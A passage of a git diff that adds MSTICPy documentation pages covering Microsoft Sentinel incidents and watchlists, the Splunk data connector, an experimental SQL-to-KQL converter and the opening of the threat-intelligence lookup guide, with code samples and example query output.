+    azs.get_incidents(incident = "875409ee-9e1e-40f6-b0b8-a38aa64a1d1c")
+
+When calling `get_incident` there are a number of boolean flags you can set to return additional information
+related to the incident.
+- entities: Returns Entities related to the incident.
+- alerts: Returns details of the Alerts related to the incident.
+- comments: Returns the Comments related to the incident.
+- bookmarks: Returns details of the Bookmarks related to the incident.
+
+Update Incidents
+----------------
+
+Via the Microsoft Sentinel API it is possible to update incidents, this includes updating details such as Severity and Status,
+as well as adding comments to an incident.
+
+To interact with an incident use `.post_comment` or `.update_incident`.
+
+To update the incident's features you need to pass `.update_incident` a dictionary of parameters and values to update.
+Details of what parameters can be updated can be found in the `Microsoft Sentinel documentation. <https://docs.microsoft.com/rest/api/securityinsights/incidents/createorupdate>`_
+
+.. note:: When modifying severity, status, or title there is no need to include the 'properties.' in the key name within the update_items dictionary
+
+See :py:meth:`update_incident <msticpy.data.azure_sentinel.MicrosoftSentinel.update_incident>`
+
+.. code:: ipython3
+
+    azs.update_incident(incident = "875409ee-9e1e-40f6-b0b8-a38aa64a1d1c",
+                update_items = {"severity":"High"},
+                )
+
+Posting comments to an incident uses the `.post_comment` function. Simply pass this function a comment as a string,
+along with an incident and workspace ID. If successful  a "Comment posted." message will be displayed.
+
+See :py:meth:`post_comment <msticpy.data.azure_sentinel.MicrosoftSentinel.post_comment>`
+
+.. code:: ipython3
+
+    azs.post_comment(incident = "875409ee-9e1e-40f6-b0b8-a38aa64a1d1c",
+                comment = "This is my comment",
+                )
+
+You can also attach boookmarks to an incident. To do this you need to pass in the incident ID or name, and a
+bookmark ID or name. This will then create a link between the incident and the bookmark.
+
+.. code:: ipython3
+
+    azs.add_bookmark_to_incident(incident = "875409ee-9e1e-40f6-b0b8-a38aa64a1d1c",
+                bookmark = "f91f3c99-2651-47fc-b625-141d4a7e50ff",
+                )
+
+
+Create Incidents
+----------------
+
+As well as interacting with existing incidents you can create them from scratch with `create_incident`.
+With this function you need to specify a number of elements about the incident including:
+- title: The name to give the incident
+- severity: The severity of the incident. This can be "Informational", "Low", "Medium" or "High"
+
+Optionally you can also provide the following details:
+- status: The status to give the incident. Options are "New", "Active" or "Closed"
+- description: A description to give the incident.
+- first_activity_time: A datetime object of the first event related to the incident.
+- last_activity_time: A datetime object of the last event related to the incident.
+- labels: A list of labels to attach to the incident
+- bookmarks: A list of bookmark IDs to associate with the incident
+
+See :py:meth:`create_incident <msticpy.data.azure.sentinel_core.MicrosoftSentinel.create_incident>`
+
+.. code:: ipython3
+
+    azs.create_incident(title="A custom incident", severity="High"
+
+)
\ No newline at end of file
diff --git a/docs/source/data_acquisition/SentinelWatchlists.rst b/docs/source/data_acquisition/SentinelWatchlists.rst
new file mode 100644
index 000000000..f6368664e
--- /dev/null
+++ b/docs/source/data_acquisition/SentinelWatchlists.rst
@@ -0,0 +1,75 @@
+Microsoft Sentinel Watchlists
+=============================
+
+List Watchlists
+---------------
+
+You can get details of the Watchlists in your workspace with 'list_watchlists'.
+
+See :py:meth:`list_watchlists <msticpy.data.azure.MicrosoftSentinel.list_watchlists>`
+
+.. code:: ipython3
+
+    azs.list_watchlists()
+
+Create Watchlists
+-----------------
+
+New watchlists can be created with `create_watchlist`. A number of things are needed when creating a new
+watchlist.
+-watchlist_name: The name of the Watchlist you want to create.
+-description: A description of the Watchlist to be created.
+-search_key: The search key is used to optimize query performance when using watchlists for joins with other data. This should be the key column that will be used in the Watchlist when joining to other data tables.
+-provider: This is the label attached to the Watchlist showing who created it, by default "MSTICPy"
+-source: The source of the data to be put in the watchlist, by default "Notebook"
+-data: A dataframe with the data you want to upload to the watchlist. This must include a column with the same name as the search_key specified.
+
+An error will be raised if the Watchlist name already exists.
+
+.. code:: ipython3
+
+    azs.create_watchlist(watchlist_name="Custom Watchlist",
+        description="A Watchlist created from a notebook",
+        search_key="IPAddress",
+        data = df,
+    )
+
+Items in a Watchlist
+--------------------
+
+You can get the items in a Watchlist with `list_watchlist_items`. Call this and pass it the name of the
+watchlist to get items from.
+
+See :py:meth:`list_watchlist_items <msticpy.data.azure.MicrosoftSentinel.list_watchlist_items>`
+
+.. code:: ipython3
+
+    azs.list_watchlist_items(watchlist_name="Custom Watchlist")
+
+Each row in the returned DataFrame will represent an item in the Watchlist, and will include details such
+as who created it and when. Columns containing the data items from the Watchlist are prefixed with 'properties.itemsKeyValue.'.
+
+You can also add items to a Watchlist with `add_watchlist_item` by passing in a Watchlist name and
+the items to add. The items to add can be in the form of a Pandas Series, DataFrame or as a dictionary of items.
+
+See :py:meth:`add_watchlist_item <msticpy.data.azure.MicrosoftSentinel.add_watchlist_item>`
+
+.. code:: ipython3
+
+    azs.add_watchlist_item(watchlist_name="Custom Watchlist",
+        item={"IPAddress": ", "13.107.6.152", "Location": "USA"}
+    )
+
+An error will be raised if the item you are trying to add already exists in the Watchlist.
+
+Delete Watchlists
+-----------------
+
+Existing Watchlists can be deleted with `delete_watchlist` by passing it the Watchlist name to be
+deleted.
+
+See :py:meth:`delete_watchlist <msticpy.data.azure.MicrosoftSentinel.delete_watchlist>`
+
+.. code:: ipython3
+
+    azs.delete_watchlist(watchlist_name="Custom Watchlist")
diff --git a/docs/source/data_acquisition/SplunkProvider.rst b/docs/source/data_acquisition/SplunkProvider.rst
new file mode 100644
index 000000000..39819663b
--- /dev/null
+++ b/docs/source/data_acquisition/SplunkProvider.rst
@@ -0,0 +1,396 @@
+Splunk Provider
+===============
+
+In this document we describe the Splunk data connector feature of
+MSTICPy. This feature is built on-top of the
+`Splunk Enterprise SDK for Python <https://dev.splunk.com/enterprise/docs/devtools/python/sdk-python/>`__
+with some customizations and enhancements.
+
+Splunk Configuration
+--------------------
+
+Splunk SDK Installation
+~~~~~~~~~~~~~~~~~~~~~~~
+
+The Splunk SDK is an optional dependency of MSTICPy. To install it,
+run the following:
+
+.. code:: ipython3
+
+    # Only run first time to install/upgrade msticpy to latest version
+    %pip install --upgrade msticpy[splunk]
+
+Splunk Configuration in MSTICPy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      Splunk:
+          Args:
+            host: splunk_host
+            port: 8089
+            username: splunk_user
+            password: [PLACEHOLDER]
+
+
+We strongly recommend storing the password secret value
+in Azure Key Vault. You can replace the text value with a referenced
+to a Key Vault secret using the MSTICPy configuration editor.
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      Splunk:
+          Args:
+            host: splunk_host
+            port: 8089
+            username: splunk_user
+            password:
+              KeyVault:
+
+Required connection parameters:
+
+===========  ===========================================================================================================================
+Parameter    Description
+===========  ===========================================================================================================================
+host         (string) The host name (the default is 'localhost').
+username     (string) The Splunk account username, which is used to authenticate the Splunk instance.
+password     (string) The password for the Splunk account.
+===========  ===========================================================================================================================
+
+
+Optional configuration parameters:
+
+===========  ===========================================================================================================================
+Parameter    Description
+===========  ===========================================================================================================================
+port         (integer) The port number (the default is 8089).
+http_scheme  ('https' or 'http') The scheme for accessing the service (the default is 'https').
+verify       (Boolean) Enable (True) or disable (False) SSL verification for https connections. (optional, the default is True)
+owner        (string) The owner context of the namespace (optional).
+app          (string) The app context of the namespace (optional).
+sharing      ('global', 'system', 'app', or 'user') The sharing mode for the namespace (the default is 'user').
+token        (string) The current session token (optional). Session tokens can be shared across multiple service instances.
+cookie       (string) A session cookie. When provided, you don’t need to call login(). This parameter is only supported for Splunk 6.2+.
+autologin    (boolean) When True, automatically tries to log in again if the session terminates.
+===========  ===========================================================================================================================
+
+
+
+Loading a QueryProvider for Splunk
+----------------------------------
+
+.. code:: ipython3
+
+        qry_prov = QueryProvider("Splunk")
+
+
+Connecting to Splunk
+--------------------
+
+Authentication for the Splunk data provider is handled by specifying
+credentials directly in the connect call or specifying the credentials
+in msticpy config file.
+
+For more information on how to create new user with appropriate roles
+and permissions, follow the Splunk documents:
+
+`Securing the Spunk platform <https://docs.splunk.com/Documentation/Splunk/8.0.5/Security/Addandeditusers>`__
+
+and
+
+`About users and roles <https://docs.splunk.com/Documentation/Splunk/8.0.5/Security/Aboutusersandroles>`__.
+
+The user should have permission to at least run its own searches or more
+depending upon the actions to be performed by user.
+
+Once you created user account with the appropriate roles, you will
+require the following details to specify while connecting:
+
+- host = "localhost" (Splunk server FQDN hostname to connect, for locally
+  installed splunk, you can specify localhost)
+- port = 8089 (Splunk REST API )
+- username = "admin" (username to connect to Splunk instance)
+- password = "yourpassword" (password of the user specified in username)
+
+Once you have details, you can specify it in ``msticpyconfig.yaml`` as
+described earlier.
+
+Authenticate using the following, if you have stored your configuration
+in *msticpyconfig.yaml*
+
+.. code:: ipython3
+
+    qry_prov.connect()
+
+Or provide connection parameters explicitly. You can also have some
+of the required parameters stored in your configuration and
+specify others (e.g. password) at connect time, as a parameter to
+connect.
+
+You can also use any of the optional parameters described earlier
+as parameters to connect.
+
+.. code:: ipython3
+
+    qry_prov.connect(host=<hostname>, username=<username>, password=<password>)
+
+
+
+Listing available queries
+-------------------------
+
+Upon connecting to the Splunk data environment, we can take a look what
+query options available to us by running
+``QUERY_PROVIDER.list_queries()``
+
+For more information, see
+:ref:`data_acquisition/dataproviders:getting help for a query`.
+
+This will display all the saved searches from the connected splunk
+instance and also pre-built custom queries to do common operations such
+as list datatypes, list saved searches, alerts, audittrail informaion.
+
+.. code:: ipython3
+
+    splunk_prov.list_queries()
+
+
+
+.. parsed-literal::
+
+    ['Alerts.list_all_alerts',
+     'SavedSearches.Errors_in_the_last_24_hours',
+     'SavedSearches.Errors_in_the_last_hour',
+     'SavedSearches.License_Usage_Data_Cube',
+     'SavedSearches.Load_sample_User_Agreements',
+     'SavedSearches.Messages_by_minute_last_3_hours',
+     'SavedSearches.Orphaned_scheduled_searches',
+     'SavedSearches.Score-Base',
+     'SavedSearches.Splunk_errors_last_24_hours',
+     'SavedSearches.Website_Performance_Problem',
+     'SavedSearches.inoperable_sites_rangemap',
+     'SavedSearches.slow_sites_avg_rangemap',
+     'SavedSearches.slow_sites_rangemap',
+     'SavedSearches.web_ping_inputs_lookup_gen',
+     'SavedSearches.website_availability_overview',
+     'SavedSearches.website_performance_problems',
+     'SplunkGeneral.get_events_parameterized',
+     'SplunkGeneral.list_all_datatypes',
+     'SplunkGeneral.list_all_savedsearches',
+     'audittrail.list_all_audittrail']
+
+
+
+In order to get help for specific query , you can execute
+``QUERY_PROVIDER.<QueryName>?`` .
+
+For more information, see
+`Getting Help for a query <DataProviders:getting-help-for-a-query>`
+
+.. code:: ipython3
+
+    splunk_prov.SplunkGeneral.get_events_parameterized?
+
+
+.. parsed-literal::
+
+    Query:  get_events_parameterized
+    Data source:  Splunk
+    Generic parameterized query from index/source
+
+    Parameters
+    ----------
+    add_query_items: str (optional)
+        Additional query clauses
+        (default value is: | head 100)
+    end: datetime (optional)
+        Query end time
+        (default value is: 08/26/2017:00:00:00)
+    index: str (optional)
+        Splunk index name
+        (default value is: \*)
+    project_fields: str (optional)
+        Project Field names
+        (default value is: | table TimeCreated, host, EventID, EventDescripti...)
+    source: str (optional)
+        Splunk source type
+        (default value is: \*)
+    start: datetime (optional)
+        Query start time
+        (default value is: 08/25/2017:00:00:00)
+    timeformat: str (optional)
+        Datetime format to use in Splunk query
+        (default value is: "%Y-%m-%d %H:%M:%S.%6N")
+    Query:
+     search index={index} source={source} timeformat={timeformat} earliest={start} latest={end} {project_fields} {add_query_items}
+
+
+If you want to print the query prior to executing, pass ‘print’ as an
+argument
+
+.. code:: ipython3
+
+    splunk_prov.SplunkGeneral.get_events_parameterized('print')
+
+
+
+
+.. parsed-literal::
+
+    ' search index=* source=* timeformat="%Y-%m-%d %H:%M:%S.%6N" earliest="2020-08-15 19:15:47.466710" latest="2020-08-15 19:15:47.466938" | table TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image, parent_process, ParentCommandLine, dest, Hashes | head 100'
+
+
+
+If you have set the arguments and then would like to validate the query,
+use below example
+
+.. code:: ipython3
+
+    splunk_prov.SplunkGeneral.get_events_parameterized('print',
+        index="botsv2",
+        source="WinEventLog:Microsoft-Windows-Sysmon/Operational",
+        timeformat="%Y-%m-%d %H:%M:%S",
+        start="2017-08-25 00:00:00",
+        end="2017-08-25 10:00:00"
+    )
+
+
+
+
+.. parsed-literal::
+
+    ' search index=botsv2 source=WinEventLog:Microsoft-Windows-Sysmon/Operational
+      timeformat=%Y-%m-%d %H:%M:%S earliest="2017-08-25 00:00:00" latest="2017-08-25 10:00:00"
+      | table TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image,
+      parent_process, ParentCommandLine, dest, Hashes | head 100'
+
+
+
+Running pre-defined queries
+---------------------------
+
+In order to run pre-defined query , execute with the name either by
+setting values for arguments if available or run with default arguments.
+
+For more information , refer to the documentation
+:ref:`Running a pre-defined query <data_acquisition/dataproviders:running a pre-defined query>`
+
+.. code:: ipython3
+
+    splunk_prov.SplunkGeneral.get_events_parameterized(
+        index="botsv2",
+        source="WinEventLog:Microsoft-Windows-Sysmon/Operational",
+        start="2017-08-25 00:00:00.000000",
+        end="2017-08-25 10:00:00.000000"
+    )
+
+
+==== ==============================  ===========  =========  ==================  ====================  ======================
+0    TimeCreated                     host         EventID    EventDescription    User                  process
+==== ==============================  ===========  =========  ==================  ====================  ======================
+0    2017-08-25T04:57:45.512440700Z  venus        3          Network Connect     NT AUTHORITY\\SYSTEM  powershell.exe
+1    2017-08-25T04:57:45.213738500Z  wrk-aturing  5          Process Terminate   nan                   conhost.exe
+2    2017-08-25T04:57:45.213738500Z  wrk-aturing  5          Process Terminate   nan                   cscript.exe
+3    2017-08-25T04:57:45.088941700Z  wrk-aturing  1          Process Create      NT AUTHORITY\\SYSTEM  conhost.exe
+4    2017-08-25T04:57:45.088941700Z  wrk-aturing  1          Process Create      NT AUTHORITY\\SYSTEM  cscript.exe
+...  ...                             ...          ...        ...                 ...                   ...
+95   2017-08-25T04:57:02.003800000Z  wrk-ghoppy   1          Process Create      NT AUTHORITY\\SYSTEM  splunk-powershell.exe
+96   2017-08-25T04:57:01.170335100Z  venus        3          Network Connect     NT AUTHORITY\\SYSTEM  powershell.exe
+97   2017-08-25T04:57:01.941402000Z  wrk-ghoppy   5          Process Terminate   nan                   splunk-winprintmon.exe
+98   2017-08-25T04:57:01.863404500Z  wrk-ghoppy   1          Process Create      NT AUTHORITY\\SYSTEM  splunk-netmon.exe
+99   2017-08-25T04:57:01.754208000Z  wrk-ghoppy   5          Process Terminate   nan                   splunk-powershell.exe
+==== ==============================  ===========  =========  ==================  ====================  ======================
+
+|
+
+By-default, splunk query results are limited to 100. you can specify
+``count=0`` argument to return all the results. Default value for
+``add_query_items`` argument is set to ``| head 100`` which you can
+reset as shown in below example while retrieving all results.
+
+.. code:: ipython3
+
+    splunk_prov.SplunkGeneral.get_events_parameterized(
+        index="botsv2",
+        source="WinEventLog:Microsoft-Windows-Sysmon/Operational",
+        start="2017-08-25 00:00:00.000000",
+        end="2017-08-25 10:00:00.000000",
+        add_query_items='',
+        count=0
+    )
+
+
+==== ==============================  ===========  =========  ==================  ====================  ======================
+0    TimeCreated                     host         EventID    EventDescription    User                  process
+==== ==============================  ===========  =========  ==================  ====================  ======================
+0    2017-08-25T04:57:45.512440700Z  venus        3          Network Connect     NT AUTHORITY\\SYSTEM  powershell.exe
+1    2017-08-25T04:57:45.213738500Z  wrk-aturing  5          Process Terminate   nan                   conhost.exe
+2    2017-08-25T04:57:45.213738500Z  wrk-aturing  5          Process Terminate   nan                   cscript.exe
+3    2017-08-25T04:57:45.088941700Z  wrk-aturing  1          Process Create      NT AUTHORITY\\SYSTEM  conhost.exe
+4    2017-08-25T04:57:45.088941700Z  wrk-aturing  1          Process Create      NT AUTHORITY\\SYSTEM  cscript.exe
+...  ...                             ...          ...        ...                 ...                   ...
+95   2017-08-25T04:57:02.003800000Z  wrk-ghoppy   1          Process Create      NT AUTHORITY\\SYSTEM  splunk-powershell.exe
+96   2017-08-25T04:57:01.170335100Z  venus        3          Network Connect     NT AUTHORITY\\SYSTEM  powershell.exe
+97   2017-08-25T04:57:01.941402000Z  wrk-ghoppy   5          Process Terminate   nan                   splunk-winprintmon.exe
+98   2017-08-25T04:57:01.863404500Z  wrk-ghoppy   1          Process Create      NT AUTHORITY\\SYSTEM  splunk-netmon.exe
+99   2017-08-25T04:57:01.754208000Z  wrk-ghoppy   5          Process Terminate   nan                   splunk-powershell.exe
+==== ==============================  ===========  =========  ==================  ====================  ======================
+
+
+
+Running an ad hoc Splunk query
+------------------------------
+
+You can also create your own query and run it via the Splunk
+provider using this syntax:
+``QUERY_PROVIDER.exec_query(<query_text>)``
+
+For more information, check documentation :ref:`data_acquisition/dataproviders:running an ad hoc query`
+
+.. code:: ipython3
+
+    splunk_query = '''
+    search index="blackhat" sourcetype="network" earliest=0
+    | table TimeGenerated, TotalBytesSent
+    '''
+    df = splunk_prov.exec_query(splunk_query)
+    df.head()
+
+====  ====================  ================
+0     TimeGenerated           TotalBytesSent
+====  ====================  ================
+   0  2020-07-02T10:00:00Z             27055
+   1  2020-07-02T09:00:00Z             33777
+   2  2020-07-02T08:00:00Z             27355
+   3  2020-07-02T07:00:00Z             25544
+   4  2020-07-02T06:00:00Z             11771
+====  ====================  ================
+
+|
+
+Other Splunk Documentation
+--------------------------
+
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Splunk`.
+
+:py:mod:`Splunk driver API documentation<msticpy.data.drivers.splunk_driver>`
+
+
+-  `Splunk Enterprise SDK for Python
+   <https://dev.splunk.com/enterprise/docs/devtools/python/sdk-python/>`__
+-  `Splunk Community
+   <https://community.splunk.com/t5/Community/ct-p/en-us>`__
+-  `Splunk Documentation <https://docs.splunk.com/Documentation>`__
diff --git a/docs/source/data_acquisition/SqlToKql.rst b/docs/source/data_acquisition/SqlToKql.rst
new file mode 100644
index 000000000..6b7dd7897
--- /dev/null
+++ b/docs/source/data_acquisition/SqlToKql.rst
@@ -0,0 +1,281 @@
+SQL TO KQL Conversion (Experimental)
+====================================
+
+The ``sql_to_kql`` module is a simple converter to KQL based on
+`moz_sql_parser <https://github.com/DrDonk/moz-sql-parser>`__. It is an
+experimental feature built to help us convert a few queries but we
+thought that it was useful enough to include in MSTICPy.
+
+It supports a subset of ANSI SQL-92 which includes the following:
+
+-  SELECT (including column renaming and functions)
+-  FROM (including from subquery)
+-  WHERE (common string and int operations, LIKE, some common
+   functions)
+-  LIMIT
+-  UNION, UNION ALL
+-  JOIN - only tested for relatively simple join expressions
+-  GROUP BY
+-  ORDER BY
+
+SQL comments are removed from the output but should not break
+the parser.
+
+It does not support HAVING, multiple SQL statements or anything complex
+and fancy like Common Table Expressions. It also does not
+support modification such as INSERT and UPDATE nor any DML.
+
+It does support a few additional Spark SQL extensions like RLIKE.
+
+Caveat Emptor!
+--------------
+
+This module is included in MSTICPy in the hope that it might be useful
+to others. We do not intend to expand its capabilities.
+
+It is also not guaranteed to produce perfectly-executing KQL - there
+will likely be things that you have to fix up in the output query. You
+will, for example, nearly always need change the names of the fields
+used since the source data tables are unlikely to exactly match the
+schema of your Kusto/Azure Sentinel target.
+
+The module does include an elementary table name mapping function that
+we demonstrate below.
+
+.. code:: ipython3
+
+    from msticpy.data.sql_to_kql import sql_to_kql
+
+
+Simple SQL Query
+----------------
+
+.. code:: ipython3
+
+    sql = """
+    SELECT DISTINCT Message, Otherfield
+    FROM apt29Host
+    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+        AND EventID BETWEEN 1 AND 10
+        AND LOWER(ParentImage) LIKE '%explorer.exe'
+        AND EventID IN ('4', '5', '6')
+        AND LOWER(Image) LIKE "3aka3%"
+    LIMIT 10
+    """
+
+    kql = sql_to_kql(sql)
+    print(kql)
+
+
+.. parsed-literal::
+
+    apt29Host
+    | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID between (1 .. 10)
+      and tolower(ParentImage) endswith 'explorer.exe'
+      and EventID in ('4', '5', '6')
+      and tolower(Image) startswith '3aka3'
+    | project Message, Otherfield
+    | distinct Message, Otherfield
+    | limit 10
+
+
+SQL Joins
+---------
+
+.. code:: ipython3
+
+    sql="""
+    SELECT DISTINCT Message, Otherfield, COUNT(DISTINCT EventID)
+    FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A
+    --FROM A
+    INNER JOIN (Select Message, evt_id FROM MyTable ) on MyTable.Message == A.Message and MyTable.evt_id == A.EventID
+    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+        AND EventID = 1
+        AND LOWER(ParentImage) LIKE "%explorer.exe"
+        AND LOWER(Image) RLIKE ".*3aka3%"
+    GROUP BY EventID
+    ORDER BY Message DESC, Otherfield
+    LIMIT 10
+    """
+
+    kql = sql_to_kql(sql)
+    print(kql)
+
+
+.. parsed-literal::
+
+    apt29Host
+    | project EventID, ParentImage, Image, Message, Otherfield
+    | join kind=inner (MyTable
+      | project Message, evt_id) on $right.Message == $left.Message
+      and $right.evt_id == $left.EventID
+    | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(ParentImage) endswith 'explorer.exe'
+      and tolower(Image) startswith '.*3aka3'
+    | summarize any(Message), any(Otherfield), dcount(EventID) by EventID
+    | order by Message desc, Otherfield
+    | limit 10
+
+
+Table Renaming
+--------------
+
+.. code:: ipython3
+
+    sql="""
+    SELECT DISTINCT Message, Otherfield, COUNT(DISTINCT EventID)
+    FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A
+    INNER JOIN (Select Message, evt_id FROM MyTable ) on MyTable.Message == A.Message and MyTable.evt_id == A.EventID
+    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+        AND EventID = 1
+        AND LOWER(ParentImage) LIKE "%explorer.exe"
+        AND LOWER(Image) RLIKE ".*3aka3%"
+    GROUP BY EventID
+    ORDER BY Message DESC, Otherfield
+    LIMIT 10
+    """
+
+    table_map = {"apt29Host": "SecurityEvent", "MyTable": "SigninLogs"}
+
+    kql = sql_to_kql(sql, table_map)
+    print(kql)
+
+
+.. parsed-literal::
+
+    SecurityEvent
+    | project EventID, ParentImage, Image, Message, Otherfield
+    | join kind=inner (SigninLogs
+      | project Message, evt_id) on $right.Message == $left.Message
+      and $right.evt_id == $left.EventID
+    | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(ParentImage) endswith 'explorer.exe'
+      and tolower(Image) startswith '.*3aka3'
+    | summarize any(Message), any(Otherfield), dcount(EventID) by EventID
+    | order by Message desc, Otherfield
+    | limit 10
+
+
+Join with Aliases
+-----------------
+
+.. code:: ipython3
+
+    sql="""
+    SELECT Message
+    FROM apt29Host a
+    INNER JOIN (
+        SELECT ProcessGuid
+        FROM apt29Host
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID = 1
+            AND LOWER(ParentImage) RLIKE '.*partial_string.*'
+            AND LOWER(Image) LIKE '%cmd.exe'
+    ) b
+    ON a.ParentProcessGuid = b.ProcessGuid
+    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+        AND EventID = 1
+        AND LOWER(Image) LIKE '%powershell.exe'
+    """
+
+    kql = sql_to_kql(sql, table_map)
+    print(kql)
+
+
+.. parsed-literal::
+
+    SecurityEvent
+    | join kind=inner (SecurityEvent
+      | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(ParentImage) matches regex '.*partial.string.*'
+      and tolower(Image) endswith 'cmd.exe'
+      | project ProcessGuid) on $left.ParentProcessGuid == $right.ProcessGuid
+    | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(Image) endswith 'powershell.exe'
+    | project Message
+
+
+Unions and Group By
+-------------------
+
+.. code:: ipython3
+
+    sql="""
+    SELECT DISTINCT Message, COUNT(Otherfield)
+    FROM (SELECT *
+        FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host)
+
+        UNION
+        SELECT DISTINCT Message, Otherfield, EventID
+        FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A
+        INNER JOIN MyTable on MyTable.mssg = A.Message
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID = 1
+            AND LOWER(ParentImage) LIKE "%explorer.exe"
+            AND LOWER(Image) RLIKE ".*3aka3%"
+        LIMIT 10
+        )
+    GROUP BY Message
+    ORDER BY Message DESC, Otherfield
+    """
+
+    kql = sql_to_kql(sql, table_map)
+    print(kql)
+
+
+.. parsed-literal::
+
+    SecurityEvent
+    | project EventID, ParentImage, Image, Message, Otherfield
+    | union (SecurityEvent
+      | project EventID, ParentImage, Image, Message, Otherfield
+      | join kind=inner (SigninLogs) on $right.mssg == $left.Message
+      | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(ParentImage) endswith 'explorer.exe'
+      and tolower(Image) startswith '.*3aka3'
+      | project Message, Otherfield, EventID
+      | distinct Message, Otherfield, EventID
+    )
+    | distinct *
+    | limit 10
+    | summarize any(Message), count(Otherfield) by Message
+    | order by Message desc, Otherfield
+
+
+Aliased and Calculated Select Columns
+-------------------------------------
+
+.. code:: ipython3
+
+    sql="""
+    SELECT DISTINCT Message as mssg, COUNT(Otherfield)
+    FROM (SELECT EventID as ID, ParentImage, Image, Message,
+        ParentImage + Message as ParentMessage,
+        LOWER(Otherfield) FROM apt29Host
+        )
+    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+        AND EventID = 1
+        AND LOWER(ParentImage) LIKE "%explorer.exe"
+    """
+    kql = sql_to_kql(sql, table_map)
+    print(kql)
+
+
+.. parsed-literal::
+
+    SecurityEvent
+    | extend ParentMessage = ParentImage + Message, Otherfield = tolower(Otherfield)
+    | project ID = EventID, ParentImage, Image, Message, ParentMessage, Otherfield
+    | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+      and EventID == 1
+      and tolower(ParentImage) endswith 'explorer.exe'
+    | extend Otherfield = count(Otherfield)
+    | project mssg = Message, Otherfield
+    | distinct *
+
diff --git a/docs/source/data_acquisition/TIProviders.rst b/docs/source/data_acquisition/TIProviders.rst
new file mode 100644
index 000000000..7830cdafa
--- /dev/null
+++ b/docs/source/data_acquisition/TIProviders.rst
@@ -0,0 +1,877 @@
+
+Threat Intel Lookup
+===================
+
+This document describes the use of the Threat Intelligence lookup class
+in msticpy. The class allows lookup of individual or multiple IoCs from
+one or more TI providers.
+
+TILookup is also extensible - you can subclass TIProvider to implement
+your own custom lookups. You can also subclass the HTTPProvider or
+KqlProvider classes, which provide support for querying a REST endpoint
+or Log Analytics table respectively.
+
+Notebook
+--------
+`TIProvider Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb>`__
+
+
+TILookup class
+--------------
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and processing
+performance may be limited to a specific number of requests per minute
+for the account type that you have.
+
+:py:mod:`TILookup API documentation<msticpy.sectools.tilookup>`
+
+
+
+Constructor
+~~~~~~~~~~~
+
+
+See :py:class:`TILookup<msticpy.sectools.tilookup.TILookup>`
+
+.. parsed-literal::
+
+
+            Initialize TILookup instance.
+
+            Parameters
+            ----------
+            primary_providers : Optional[List[TIProvider]], optional
+                Primary TI Providers, by default None
+            secondary_providers : Optional[List[TIProvider]], optional
+                Secondary TI Providers, by default None
+            providers: Optional[List[str]], optional
+                List of provider names to load, by default all available
+                providers are loaded. To see the list of available providers
+                call `TILookup.list_available_providers()`.
+                Note: if primary_provides or secondary_providers is specified
+                This will override the providers list.
+
+Methods
+~~~~~~~
+
+* *add_provider()* - Add a TI provider to the current collection.
+* *available_providers()* - Return a list of built-in providers.
+* *list_available_providers()* - Print a list of built-in providers with
+  optional usage. (class method)
+* *loaded_providers()* - Return dictionary of loaded providers.
+* *lookup_ioc()* - Lookup single IoC in active providers.
+* *lookup_iocs()* - Lookup a collection of IoCs.
+* *provider_status()* - Return loaded provider status.
+* *provider_usage()* - Print usage of loaded providers.
+* *reload_provider_settings()* - Reload provider settings from config.
+* *reload_providers()* - Reload providers based on current settings in config.
+* *result_to_df()* - Return DataFrame representation of IoC Lookup response.
+
+
+Available Providers
+-------------------
+
+The **msticpy** TI Provider library can lookup IoCs in multiple
+providers.
+
+The :py:meth:`list_available_providers <msticpy.sectools.tilookup.TILookup.list_available_providers>`
+class method shows the current set of providers.
+
+.. code:: ipython3
+
+    >>> TILookup.list_available_providers()
+
+    AzSTI
+    GreyNoise
+    OPR
+    OTX
+    Tor
+    VirusTotal
+    XForce
+
+You can view the list of supported query types for each provider
+with the ``show_query_types=True`` parameter.
+See
+
+.. code:: ipython3
+
+    >>> TILookup.list_available_providers(show_query_types=True)
+
+    AzSTI
+    Azure Sentinel TI provider class. Supported query types:
+      ioc_type=dns
+      ioc_type=file_hash
+      ioc_type=hostname
+      ioc_type=ipv4
+      ioc_type=ipv6
+      ioc_type=linux_path
+      ...
+
+Loading TI Providers
+--------------------
+
+Calling TILookup with no parameters will load all of the available providers
+that have a configuration entry in ``msticpyconfig.yaml`` (see next section).
+
+.. code:: ipython3
+
+    # load all configured providers
+    ti_lookup = TILookup()
+    ti_lookup.provider_status
+
+    # Restricting which providers get loaded
+    #ti_lookup = TILookup(providers=["VirusTotal", "XForce"])
+
+.. parsed-literal::
+
+    ['VirusTotal - VirusTotal Lookup. (primary)',
+     'XForce - IBM XForce Lookup. (primary)']
+
